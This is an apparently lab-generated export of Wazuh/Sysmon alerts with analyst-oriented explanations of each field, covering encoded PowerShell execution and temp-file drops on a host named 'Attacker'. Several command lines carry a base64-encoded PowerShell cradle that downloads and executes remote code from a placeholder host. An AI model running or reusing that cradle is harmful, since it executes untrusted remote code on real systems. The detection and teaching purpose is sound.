data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 129 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535376.2803115 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:14.2252877Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350674 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:14.198
ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00}
ProcessId: 1724
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_xdqtovfm.esx.ps1
CreationUtcTime: 2025-04-24 22:56:14.198
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:14.198 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c18c-680a-f20c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1724 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xdqtovfm.esx.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:14.198 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 126 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535381.2805880 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:18.4933409Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350713 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:15.702
ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00}
ProcessId: 8928
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00}
ParentProcessId: 1724
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:15.702 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c18f-680a-f40c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8928 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 1724 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 130 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535381.2813943 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:18.7447989Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350714 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:18.693
ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00}
ProcessId: 8928
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cew1hm2c.hha.ps1
CreationUtcTime: 2025-04-24 22:56:18.689
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:18.693 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c18f-680a-f40c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8928 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cew1hm2c.hha.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:18.689 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 127 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535385.2816708 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:22.6536408Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350737 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:19.920
ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00}
ProcessId: 1672
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00}
ParentProcessId: 8928
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:19.920 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c193-680a-f60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8928 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 131 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535385.2824771 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:22.8755727Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350738 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
